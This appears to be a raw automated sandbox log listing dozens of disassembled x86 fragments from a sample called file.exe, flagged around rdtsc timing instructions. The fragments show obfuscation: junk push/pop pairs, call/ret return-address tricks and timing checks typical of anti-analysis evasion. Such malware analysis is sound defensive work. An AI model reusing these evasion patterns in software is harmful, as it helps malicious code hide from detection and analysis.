Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC080 second address: BFC0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov esi, dword ptr [ebp+122D3F5Ch] 0x00000010 push 00000000h 0x00000012 xor si, E10Bh 0x00000017 push 00000000h 0x00000019 adc di, 30A6h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD9EA second address: BFDA6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0F345319E8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1D02h], edx 0x0000002d push 00000000h 0x0000002f cmc 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F0F345319E8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+122DBC8Bh] 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push edx 0x00000056 jmp 00007F0F345319F2h 0x0000005b pop edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1E9 second address: BFD1EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1EF second address: BFD1F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFE503 second address: BFE51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC153h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1F4 second address: BFD1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFEE52 second address: BFEEDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC151h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 sbb esi, 15047600h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F0F34BEC148h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 pushad 0x00000033 mov eax, ebx 0x00000035 pushad 0x00000036 mov dh, bh 0x00000038 or cl, FFFFFFFAh 0x0000003b popad 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F0F34BEC148h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov dword ptr [ebp+122D22A9h], ecx 0x0000005f xchg eax, ebx 0x00000060 js 00007F0F34BEC154h 0x00000066 pushad 0x00000067 je 00007F0F34BEC146h 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0029D second address: C002A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0F345319E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00CEB second address: C00D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F34BEC154h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e js 00007F0F34BEC158h 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F0F34BEC146h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00D16 second address: C00D76 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F345319E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jp 00007F0F345319EEh 0x00000011 pushad 0x00000012 or dword ptr [ebp+122D1F4Eh], edi 0x00000018 sbb ch, 00000007h 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F0F345319E8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 push esi 0x00000039 sbb si, 1841h 0x0000003e pop edi 0x0000003f push 00000000h 0x00000041 mov dword ptr [ebp+1247974Eh], edi 0x00000047 xchg eax, ebx 0x00000048 pushad 0x00000049 pushad 0x0000004a push esi 0x0000004b pop esi 0x0000004c jnc 00007F0F345319E6h 0x00000052 popad 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04295 second address: C04299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04299 second address: C042AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0F345319EBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C042AD second address: C042B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB042F second address: BB043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB043F second address: BB044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0F34BEC146h 0x0000000a ja 00007F0F34BEC146h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB044F second address: BB0453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB0453 second address: BB0472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F0F34BEC146h 0x00000010 jmp 00007F0F34BEC14Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB0472 second address: BB0476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0765D second address: C0769C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, F5EDh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0F34BEC148h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov bl, 71h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C06770 second address: C0677F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C08772 second address: C08776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C08776 second address: C0877A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0877A second address: C087D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0F34BEC148h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jns 00007F0F34BEC148h 0x00000028 mov ebx, dword ptr [ebp+122D3C58h] 0x0000002e push 00000000h 0x00000030 clc 0x00000031 push 00000000h 0x00000033 mov bh, 5Ch 0x00000035 mov di, ax 0x00000038 xchg eax, esi 0x00000039 jmp 00007F0F34BEC14Fh 0x0000003e push eax 0x0000003f jo 00007F0F34BEC14Eh 0x00000045 push ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0971B second address: C0971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0971F second address: C09729 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0A75C second address: C0A7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F0F345319E8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 sub ebx, dword ptr [ebp+122D2414h] 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F0F345319E8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 js 00007F0F345319F0h 0x0000004f jmp 00007F0F345319EAh 0x00000054 push eax 0x00000055 jc 00007F0F345319F2h 0x0000005b jp 00007F0F345319ECh 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C763 second address: C0C7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC150h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c js 00007F0F34BEC154h 0x00000012 pushad 0x00000013 jp 00007F0F34BEC146h 0x00000019 jo 00007F0F34BEC146h 0x0000001f popad 0x00000020 nop 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F0F34BEC148h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b adc edi, 0EC0C071h 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007F0F34BEC148h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d mov ebx, dword ptr [ebp+122D3CE0h] 0x00000063 push 00000000h 0x00000065 mov dword ptr [ebp+122D1F99h], esi 0x0000006b xchg eax, esi 0x0000006c js 00007F0F34BEC14Eh 0x00000072 push edi 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0B8D9 second address: C0B8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C7EF second address: C0C7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0B8DE second address: C0B8E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C7FB second address: C0C7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0B8E3 second address: C0B904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F0F345319F5h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C7FF second address: C0C80D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D850 second address: C0D854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA5C second address: C0CA92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F34BEC155h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D854 second address: C0D85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA92 second address: C0CA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA96 second address: C0CA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C137FF second address: C13867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F34BEC150h 0x0000000b pushad 0x0000000c jmp 00007F0F34BEC14Eh 0x00000011 jmp 00007F0F34BEC158h 0x00000016 js 00007F0F34BEC146h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F0F34BEC158h 0x00000026 push eax 0x00000027 push edx 0x00000028 jl 00007F0F34BEC146h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB3984 second address: BB398A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E2A second address: C13E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0E9E3 second address: C0E9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E30 second address: C13E75 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F0F34BEC148h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 movzx edi, dx 0x0000002c push 00000000h 0x0000002e sub ebx, dword ptr [ebp+122D3C40h] 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D1E3Dh], esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E75 second address: C13E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E7C second address: C13E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC151h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DA78 second address: C0DA7E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11A66 second address: C11A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14DA3 second address: C14DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F0F345319E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F0F345319F8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F345319F1h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C140BA second address: C140CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C140CF second address: C140D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15E27 second address: C15E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15E2D second address: C15E8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edi, dword ptr [ebp+1244C22Dh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F0F345319E8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b sub bh, FFFFFF97h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+12458D61h], esi 0x00000036 xchg eax, esi 0x00000037 jnp 00007F0F345319F9h 0x0000003d push eax 0x0000003e jp 00007F0F345319EEh 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16013 second address: C16017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1B5 second address: C2A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007F0F345319E6h 0x0000000c jmp 00007F0F345319EDh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1CF second address: C2A1D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1D5 second address: C2A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1DB second address: C2A1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1DF second address: C2A1E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0F345319E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29506 second address: C2950C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2950C second address: C29512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29512 second address: C29518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29518 second address: C2951C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2951C second address: C29530 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0F34BEC146h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29530 second address: C29536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29800 second address: C2980F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC14Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2980F second address: C2981D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C299B2 second address: C299CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC155h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C299CF second address: C299D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C299D9 second address: C299E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F82E second address: C2F834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F834 second address: C2F84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 jp 00007F0F34BEC146h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F0F34BEC146h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F84D second address: C2F851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F851 second address: C2F861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0F34BEC146h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F861 second address: C2F865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F865 second address: C2F86F instructions: 0x00000000 rdtsc 0x00000002 js 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F86F second address: C2F87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0F345319E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F87B second address: C2F87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2EB46 second address: C2EB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F0CD second address: C2F0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F0D1 second address: C2F0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
